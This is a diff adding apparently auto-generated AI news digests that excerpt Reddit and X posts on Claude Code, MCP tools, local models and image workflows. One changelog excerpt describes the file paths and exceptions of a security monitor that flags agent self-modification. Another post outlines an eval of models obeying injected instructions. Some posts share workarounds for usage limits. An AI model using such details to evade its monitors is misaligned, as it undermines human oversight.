cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express "miss to L1 vs miss to L3 vs full recompute," which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. **Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers… + +--- + +## [Claude MCP integration made my old meeting notes actually useful again](https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 +Tags: mcp, tool_update + +> I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet? + +--- + +## [Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:](https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 +Tags: api_update, cli_tool + +> The Karpathy coding skill is locked behind Pro. It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually ("can you add X", "why is this breaking", "clean this up"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like "implement", "build", "add", "fix", "change", or "improve" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage… + +--- + +## [What MCP servers are you guys using for persistent memory?](https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/) +*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.96 +Tags: mcp, tool_update + +> Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? Just trying to see what the standard stack is for keeping claude grounded. + +--- + +## [I realized character consistency breaks after the first few images](https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/) +*Reddit r/StableDiffusion* | 12/05/2026 | Score: 0.90 +Tags: open_source, cli_tool + +> I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever… + +--- + +## [My First Official AI Research Paper Accepted on SSRN](https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: product_launch + +> https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059) + +--- + +## [What solutions are you using to boost TPS and Context Window?](https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/) +*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 +Tags: api_update + +> **Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work? + +--- + +## [How many years do you think we are from making feature films at home?](https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/) +*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 +Tags: open_source + +> What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. Shari… + +--- + +## [Chroma1-HD Character Transfer with Flux.2 Dev](https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/) +*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 +Tags: open_source + +> [Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\_flux\_character\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they… + +--- + +## [Vulkan or CPU llama cpp backend for local llm for coding/code assist](https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/) +*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 +Tags: developer_tool + +> Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g… + +--- + diff --git a/data/digest-2026-05-13.md b/data/digest-2026-05-13.md new file mode 100644 index 0000000..e36aff8 --- /dev/null +++ b/data/digest-2026-05-13.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-13** | 15 stories | Auto-generated from 656 archived stories + +--- + +## [I'm cooked. Anthropic just split "--print" mode to $/mo credits](https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, cli_tool, tool_update + +> So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \[tickets + agents + hooks + executors -> "claude -p" -> hands-free always-on productivity\]. Now that Anthropic has announced that "claude --print" will, from June 15 forward, be considered "programmatic" SDK usage, all jobs launched using "--print" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below! + +--- + +## [TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).](https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat… + +--- + +## [Cross devices agent memory and context management?](https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: api_update, cli_tool, tool_update + +> Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type "codex" or "claude". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest "CHANGELOG" markdown file, or maybe even "HANDOFF.md" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. I just wanna learn how others (10x devs) tackling such problem/worklow? + +--- + +## [The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?](https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: api_update, open_source, tool_update + +> Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. **What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't "generate me a landing page." It's sustained autonomous development where the model maintains context across sessions, manages… + +--- + +## [Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)](https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: mcp, product_launch, agent_tool + +> * NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. * Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops "in your system prompt" from the "default to forking" reference so the rule applies generically to parent guidance. * Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa… + +--- + +## [Context Is Not Control, a source-boundary eval for LLMs](https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \* evidence \* user framing \* quoted material \* source text \* instruction-like contamination \* unsupported claims \* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that… + +--- + +## [What kinds of models are people training with document data? [P]](https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/) +*Reddit r/MachineLearning* | 13/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> We've helped some folks with synthetic data for a number of different projects and some of them for "document data". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? :-) + +--- + +## [A new monthly Agent SDK credit for Claude plans](https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr… + +--- + +## [Anthropic launches Claude For Legal with practice-area plugins and MCP connectors to nine major legal platforms](https://reddit.com/r/ClaudeAI/comments/1tbvje0/anthropic_launches_claude_for_legal_with/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: mcp, product_launch + +> Anthropic rolled out Claude For Legal (May 12), adding practice-area plugins for commercial, employment, privacy, product, corporate, and AI governance law. The release also includes MCP connectors to tools lawyers already use: DocuSign, Ironclad, iManage, NetDocuments, LexisNexis, Thomson Reuters, Box, Everlaw, and LSuite. This follows the same playbook as Claude for Creative Work from April. Anthropic seems to be systematically building vertical-specific connector ecosystems rather than shipping a general-purpose tool. Each launch bundles domain plugins with integrations into the professional software stack people already have open. Curious whether anyone in legal has tried the practice-area plugins yet, specifically how they compare to just prompting base Claude with domain context. Source: [https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html](https://www.streetinsider.com/Reuters/Anthropic%2Bexpands%2BClaude%27s%2BAI%2Btools%2Bfor%2Blaw%2Bfirms%2C%2Blawyers/26476360.html) + +--- + +## [A fully autonomous browser runtime for any AI agents](https://reddit.com/r/ClaudeAI/comments/1tbv937/a_fully_autonomous_browser_runtime_for_any_ai/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Built (with Claude) an open source, fully autonomous browser runtime for agents. One critical issue I faced (I guess most of us do) is the inability to have a robust web search feature and this will help you direct towards that goal I hope - this AgenticBrowser needs zero human intervention. If a human can access it, the agent accesses it. Approach it as an idea or a base to build better stuff - maybe you will think of something even better than this - I built this after working with various web-search features for the Agentic framework (Jork) that I built a couple of months back - thought instead of making it just a Power of Jork, could be helpful to make it independent so any agent built on any framework can use it. No third party stuff is needed. Please take a look and let me know: + +--- + +## [I built a native macOS app to manage Claude Code sessions, accounts, and projects](https://reddit.com/r/ClaudeAI/comments/1tbtpl2/i_built_a_native_macos_app_to_manage_claude_code/) +*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 +Tags: cli_tool, tool_update + +> I've been using Claude Code daily for months and kept running into the same friction — juggling multiple terminal tabs for different projects, getting rate limited and manually switching accounts, losing work when I forgot to commit. So I built Claudy — a native macOS wrapper around Claude Code that handles all of that: * Multi-session: run multiple Claude Code sessions side by side with a proper sidebar * Auto account switching: when you hit the usage limit, it switches to another account automatically * Draft Commits: checkpoint your work mid-session and restore it anytime * Marketplace: install Skills, MCPs, and Commands in one click Built with SwiftUI + SwiftData, using libghostty (Ghostty's terminal core) for the terminal emulator. Just launched on Product Hunt today if anyone wants to check it out: [https://www.producthunt.com/products/claudy?launch=claudy](https://www.producthunt.com/products/claudy?launch=claudy) Happy to answer any questions about the build or the features! + +--- + +## [Fast mode for Claude Opus 4.7 is now available on the api.](https://x.com/DailyXplorer/status/2054464151234228372) +*X search / AI model updates* | 13/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Fast mode for Claude Opus 4.7 is now available on the api. + +--- + +## [Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI t…](https://x.com/jiaweihq/status/2054463419722707134) +*X search / Agent workflows* | 13/05/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> Day 8 of $0 → $1 MRR (Live) ✦ Building Update Night 3/5 The leverage in AI right now is knowing what's out there. Telegram and Discord are great in the moment, bad at memory. So I'm building Update Night, the searchable home for every AI tool, framework, and MCP server worth + +--- + +## [Local AI video pipeline review: Qwen3 27B beat Gemma 4 26B for tool calling](https://reddit.com/r/LocalLLaMA/comments/1tbof8k/local_ai_video_pipeline_review_qwen3_27b_beat/) +*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Watched All About AI's 100% local Fireship-style video automation experiment over the weekend (link in comments). A few things worth flagging if you're trying the same stack. Tool calling reliability was where the two diverged. Gemma 4 26B kept getting stuck in tool-call loops on his rig. Qwen 3.6 27B handled the same orchestration cleanly, no wasted thinking tokens. That gap is bigger than benchmark numbers suggest once you push real agent workflows through it. For images he ran Said Image Turbo locally off Hugging Face. Open weights, no API spend. Solid for meme-style cards. Portrait shots are where you'd probably reach for a Flux or Seedream call instead. Orchestration was OpenCode end-to-end. Context window climbed to 174K tokens and the to-do list wasn't fully completed in one shot. He stepped away from the rig mid-run and came back to a partial result, which is honestly the realistic version of "AI did the work for me". For people not wanting to run a 27B model locally, Qwen3 family is on a few inference providers so the API path keeps the same weights without the GPU upfront. Tool-call behavior holds since the model is the same. If you've benchmarked Qwen3 tool-calling fail… + +--- + +## [I built a local GUI + AI builder for creating ComfyUI custom node packs](https://reddit.com/r/StableDiffusion/comments/1tbk8zv/i_built_a_local_gui_ai_builder_for_creating/) +*Reddit r/StableDiffusion* | 13/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> I've been working on ComfyUI Node Builder, a local app for building custom ComfyUI nodes without hand-writing all the boilerplate every time. The demo shows: 1. user describes a node idea 2. AI creates the node contract and Python 3. dependencies/files are updated 4. the pack is deployed and tested in ComfyUI It is open-source and local. The AI Builder can create nodes, edit generated files, explain validation errors, run checks, and request deploy only when deploy permission is enabled. GitHub: https://github.com/caoool/comfyui-node-canvas Landing page: https://caoool.github.io/comfyui-node-canvas/ Node ideas and feedback: https://github.com/caoool/comfyui-node-canvas/issues/2 I'd especially like feedback from people who build custom nodes: what node authoring workflow should this support next? + +--- + diff --git a/data/digest-2026-05-14.md b/data/digest-2026-05-14.md new file mode 100644 index 0000000..c62ad7a --- /dev/null +++ b/data/digest-2026-05-14.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-14** | 15 stories | Auto-generated from 592 archived stories + +--- + +## [The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in.](https://x.com/OpenAIDevs/status/2051725072873001338) +*X / @openaidevs* | 05/05/2026 | Score: 1.00 +Tags: api_update, product_launch, open_source, developer_tool, tool_update + +> The updated Agents SDK is now available in TypeScript, with support for sandbox agents and an open-source harness built in. + +--- + +## [Computer-use MCP that can control multiple machines (Integrate with claude, Cursor, Codex or your custom harness)](https://reddit.com/r/LocalLLaMA/comments/1tcpgsv/computeruse_mcp_that_can_control_multiple/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: mcp, open_source, agent_tool + +> Hey everyone, We built opendesk: it lets AI agents control your desktop using computer use MCP that can integrate with your custom workflow. Today we shipped something a bit wild: Your AI can now see, click, type, and navigate on a completely different computer, over your WiFi. You can pair them once and your agent can control it all from a single conversation. No cloud, account login, or servers in the middle. Everything stays on your local network, fully encrypted. Free and open source — Mac, Linux, and Windows. [github.com/vitalops/opendesk](http://github.com/vitalops/opendesk) Happy to answer any questions! + +--- + +## [Simpler self hosted alt to Open WebUI](https://reddit.com/r/LocalLLaMA/comments/1tciwwt/simpler_self_hosted_alt_to_open_webui/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, tool_update + +> Got Qwen3.6 27B running on my newly assembled 4x 3090 rig (s/o 3090-club) and I'm trying to get the people in my house to adopt the local workflow. Open WebUI has improved a lot in the recent updates, but I still found it pretty rough for non-technical people. It often feels more like a dev tool than a self-hosted ChatGPT-style app that "just works". I built overtchat to focus mainly on getting the core chat experience right: a polished ui, simple setup and fewer moving parts. The goal is not to compete on agentic workflow with LibreChat/LobeChat/OWUI but to provide a cleaner self-hosted interface for local models. Ships with its own tried & tested searxng config for web search, kokoro tts (no api keys needed). Single docker compose file. MIT licensed of course, no telemetry. Optimized for mobile as PWA. [Github](https://github.com/yoloyash/overtchat). Also being upfront - I write code for a living and have been actively reviewing/debugging/changing things, but I did use quite a lot of AI lol. I promise it's not slop tho 😿 . Feedback is welcome! + +--- + +## [My AI runs 24/7 on Claude Code without -p. Here's the hook to do it yourself.](https://reddit.com/r/ClaudeAI/comments/1tcicvb/my_ai_runs_247_on_claude_code_without_p_heres_the/) +*Reddit r/ClaudeAI* | 14/05/2026 | Score: 1.00 +Tags: api_update, product_launch, developer_tool + +> **Saw the thread about the June 15 credit change. Built a drop-in `-p` replacement using hooks — no SDK credits needed.** edit: 29 stars! my first real repo \o/ A lot of people are upset about losing subsidized `-p` usage. I built something that gives you the same stateless, one-message-at-a-time behavior — but in interactive mode, on your regular subscription. **How it works:** 1. A supervisor launches Claude Code in interactive mode 2. A stop hook polls an inbox file for new messages 3. When a message arrives, the hook injects it — **one message per session** 4. The agent processes it and writes a response to an outbox file 5. The supervisor kills the session and restarts with **fresh context** 6. Next message gets a clean session — true stateless operation, like `-p` When idle, the hook polls internally and blocks with minimal ticks (~20 tokens each). No context inflation from idle waiting. **What you get:** - **Stateless per message** — each task gets fresh context, just like `-p` - **No SDK credits** — interactive mode uses your subscription - **Autonomous** — watches inbox, processes messages, writes responses - **Cheap idle** — minimal token overhead while waiting for work… + +--- + +## [[N] LangChain Interrupt 2026 announcements [N]](https://reddit.com/r/MachineLearning/comments/1td4v0a/n_langchain_interrupt_2026_announcements_n/) +*Reddit r/MachineLearning* | 14/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> LangChain just wrapped Day 1 of Interrupt 2026 and announced a few things worth knowing about: **SmithDB** — A purpose-built distributed database for agent observability. The problem they're solving: agent traces are getting too large and complex for general-purpose databases. SmithDB is built with Rust, Apache DataFusion, and Vortex, designed specifically for multimodal content and long-span tracing. They're reporting P50 latency of 92ms for loading trace trees and 400ms for full-text search, with up to 12x speedup over previous LangSmith performance. Architecture is object storage + small Postgres metadata store + stateless services, so it scales elastically and can be self-hosted. **Context Hub** — A centralized system for managing agent context (AGENTS.md files, skills, policies, memory) in LangSmith. The interesting part is they're working with MongoDB, Pinecone, Elastic, and Redis on an open standard for agent memory — covering episodic, semantic, and procedural memory with versioning and portability across frameworks. **Deep Agents v0.6** — New release includes ContextHubBackend integration, an installable code interpreter that gives agents a programmable workspace inside t… + +--- + +## [A VERY lightweight open web-search tool for smaller local LLMs](https://reddit.com/r/LocalLLaMA/comments/1tczzga/a_very_lightweight_open_websearch_tool_for/) +*Reddit r/LocalLLaMA* | 14/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> Hey everyone, Been playing around with local agent setups lately, mostly Cline/Roo with smaller models, and web search kept annoying me. Not because it doesn’t work, but because it usually throws way too much random page text into the context. small models really don’t handle that gracefully lol. they start with a simple search and suddenly half the prompt is scraped garbage. So I built bad boy, TinySearch. It’s a small open-source MCP tool that does web search, crawls a few pages, chunks/retrieves/reranks the useful bits, and gives the agent a much smaller context blob instead of dumping full pages. Repo: [https://github.com/MarcellM01/TinySearch](https://github.com/MarcellM01/TinySearch) Uses DuckDuckGo, Crawl4AI, dense + BM25-style retrieval, reranking, MCP, and it can also run as a FastAPI server. On my setup (M4 Mac and old ahh lenovo thinkpad) it usually takes around 5–12 seconds end to end, depending on the query/machine Not trying to replace real search infra or anything. it’s more just a little local research layer for people building agents who don’t want to spin up a whole backend just to let the model look stuff up. Still rough in places, but it’s been useful enough fo… + +--- + +## [Stable Diffusion WebUI Forge for AMD GPU](https://reddit.com/r/StableDiffusion/comments/1tcyyb4/stable_diffusion_webui_forge_for_amd_gpu/) +*Reddit r/StableDiffusion* | 14/05/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> It was a f\*cking chore that took almost 9 hours but i was able to FINALLLLLY MAKE IT !!!! I´ve reached it ! So... i am gonna share the files that made it possible. "Proof pics" "[https://github.com/lllyasviel/stable-diffusion-webui-forge](https://github.com/lllyasviel/stable-diffusion-webui-forge)" *The link should look like this* [\>>> Click Here to Download One-Click Package (CUDA 12.1 + Pytorch 2.3.1) <<<](https://github.com/lllyasviel/stable-diffusion-webui-forge/releases/download/latest/webui_forge_cu121_torch231.7z) Once its done click on extract into a folder... There click on update.bat.... then from there find all the files "down bellow in the picture" see what the files are and then either download the google drive links or copy paste the text i wrote down on facebook link and delete the original. Then u gotta click thru the webui-user.bat , webui.bat and run.bat... I have no clue in what order though ... good luck xd 